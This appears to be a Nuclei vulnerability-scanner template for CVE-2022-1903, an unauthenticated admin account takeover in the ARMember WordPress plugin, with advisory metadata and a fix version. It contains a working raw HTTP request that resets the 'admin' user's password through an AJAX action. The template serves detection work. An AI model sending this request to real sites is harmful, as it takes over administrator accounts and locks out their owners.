55 lines
1.7 KiB
YAML
55 lines
1.7 KiB
YAML
id: CVE-2022-1903
|
|
|
|
info:
|
|
name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08
|
|
- https://wordpress.org/plugins/armember-membership/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1903
|
|
remediation: Fixed in version 3.4.8
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2022-1903
|
|
cwe-id: CWE-862
|
|
epss-score: 0.2399
|
|
cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
framework: wordpress
|
|
vendor: armemberplugin
|
|
product: armember
|
|
tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Your Password has been reset"
|
|
- "arm_success_msg"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|